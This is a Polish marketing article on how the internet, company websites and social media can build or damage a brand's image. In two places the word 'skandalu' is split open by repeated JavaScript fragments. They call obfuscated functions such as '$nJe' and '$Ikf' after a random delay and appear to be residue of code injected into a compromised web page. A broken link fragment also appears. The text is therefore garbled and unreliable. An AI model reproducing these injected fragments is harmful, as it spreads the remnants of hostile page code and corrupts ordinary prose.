Internet w budowaniu wizerunku marki – pomaga czy przeszkadza? – Firma Przyjazna Klientowi

Internet w budowaniu wizerunku marki – pomaga czy przeszkadza?

Internet w budowaniu wizerunku marki – pomaga czy przeszkadza

Profile firmowe na portalach społecznościowych nikogo już nie dziwią. Tego rodzaju media stają się też ważną przestrzenią do działań reklamowych, a także pozwalają klientom danej marki tworzyć tzw. „społeczność” skupioną wokół produktu lub usługi. Internet staje się w ten sposób jednym z kluczowych narzędzi służących w kształtowaniu wizerunku marki. Czy istnieje jednak druga strona medalu?

W poszukiwaniu rekomendacji

W dzisiejszych czasach, dzięki rozwojowi reklamy w sieci i sklepów online, duża część zysków firm jest związana z ich działalnością internetową. Firmy, starając się utrzymać wysoki poziom towarów i obsługi klienta, dbają o swój dobry wizerunek, przyciągając kolejnych zadowolonych kupujących i zleceniodawców. Dzięki dostępnym w sieci opiniom możemy łatwo poznać dobre i złe strony danego przedsiębiorstwa, co przyczynia się do naszej ostatecznej decyzji o zakupie produktu czy skorzystaniu z usługi.

Strona internetowa – wiarygodne źródło informacji

Dobrze wykonana strona internetowa prezentująca zakres działalności przedsiębiorstwa  istotnie wpływa na powodzenie marki. Czytelna struktura, interesująca prezentacja oferty mogą skłonić użytkowników wyszukiwarki do skorzystania z usług czy zakupu produktów danej firmy. Systematyczne aktualizowanie informacji, różnego rodzaju konkursy czy artykuły powiązane z branżą i marką (np. blog firmowy), budują zaufanie do niej, wpływając na popyt na określone produkty i przyczyniając się do wzrostu sprzedaży.

Budowanie relacji w mediach społecznościowych

Głównym wyznacznikiem powodzenia marki stały również się media społecznościowe. Witryny, takie jak Facebook, Twitter czy Instagram, przerodziły się w ogólnodostępne bazy informacji, znacząco wpływające na podejmowanie decyzji wśród innych internautów. Odpowiednio nakierowane działania pomagające zbudować trwałą relację z użytkownikami marki na dłuższą metę przynoszą istotne korzyści. Zadowoleni internauci chętnie promują dany produkt, polecając go znajomym i innym osobom korzystającym z sieci. Według badań, tego typu promowanie i osobiste rekomendacje przynoszą lepsze efekty niż reklama tradycyjna.

Internet to też zagrożenie

Internet może zostać również wykorzystany w sposób szkodzący wizerunkowi marki. Negatywne opinie użytkowników są na ogół postrzegane jako bardzo wiarygodne i mogą wpływać na postrzeganie firmy. Jeśli wziąć pod uwagę wyniki różnych badań, mamy większą skłonność do tego, by dzielić się negatywnymi ocenami. Obniża to znacząco zaufanie do marki, a osoby, które przeczytają negatywne wypowiedzi, prawdopodobnie nie skorzystają z oferty naszego przedsiębiorstwa.

Warto również podkreślić, że internet utrudnia (często wręcz uniemożliwia) firmie zachowanie anonimowości. Doskonale wiedzą o tym PR-owcy, osoby odpowiedzialne za budowanie wizerunku marki. Jedna niefortunna wypowiedź przedstawiciela firmy, wybuch skandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andalu lub afery – najprawdopodobniej odbije się szerokim echem w sieci. Ma to szczególne znaczenie zwłaszcza w przypadku małych firm, działających lokalnie. Trudno będzie wyciszyć negatywne emocje, zatrzeć wrażenie, a to może przyczynić się do podważenia pozycji danej marki w zdecydowanie większym stopniu niż jeszcze 15-20 lat temu, kiedy dostęp do internetu nie był tak powszechny.

Internet może być bardzo pomocny w towi.pl/czynniki-ksztaltujace-wizerunek-firmy/”>kształtowaniu pozytywnego wizerunku marki. Stwarza użytkownikom możliwość do rekomendowania produktów. Z drugiej strony wszystkie działania firmy powinny być przemyślane: zła jakość obsługi, wybuch skandom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andalu, plotki o złej kondycji finansowej – takie informacje łatwo przedostają się do sieci i mogą podważyć zaufanie do marki. Warto pamiętać o tym zagrożeniu.